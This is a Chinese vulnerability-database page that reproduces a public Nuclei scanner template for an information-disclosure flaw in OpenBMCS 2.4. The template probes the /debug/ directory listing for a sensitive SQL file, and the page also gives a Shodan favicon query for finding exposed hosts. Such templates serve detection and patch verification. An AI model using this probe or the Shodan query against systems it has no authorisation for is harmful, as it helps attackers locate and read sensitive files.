openbmcs-secret-disclosure: OpenBMCS 2.4 - Information Disclosure

日期: 2025-08-01 | 影响软件: OpenBMCS | POC: 已公开

漏洞描述

OpenBMCS 2.4 contains an information disclosure vulnerability. The application allows directory listing and exposure of some sensitive files, which can allow an attacker to leverage the disclosed information and gain full access.

PoC代码[已公开]

id: openbmcs-secret-disclosure

info:
  name: OpenBMCS 2.4 - Information Disclosure
  author: dhiyaneshDK
  severity: high
  description: OpenBMCS 2.4 contains an information disclosure vulnerability. The application allows directory listing and exposure of some sensitive files, which can allow an attacker to leverage the disclosed information and gain full access.
  reference:
    - https://www.exploit-db.com/exploits/50671
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:1550906681
  tags: misconfig,edb,openbmcs,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/debug/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "change_password_sqls"
          - "Index of /debug"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cf91697ec114cc6e67c711d17ae9e2fc45b1a4f04ab68cc2fc5d5c2524025def022100aa5df8ac79b9584518f8d8cbc246cfb5f7a903bbcc2e3a35341fe1d9b25603d7:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐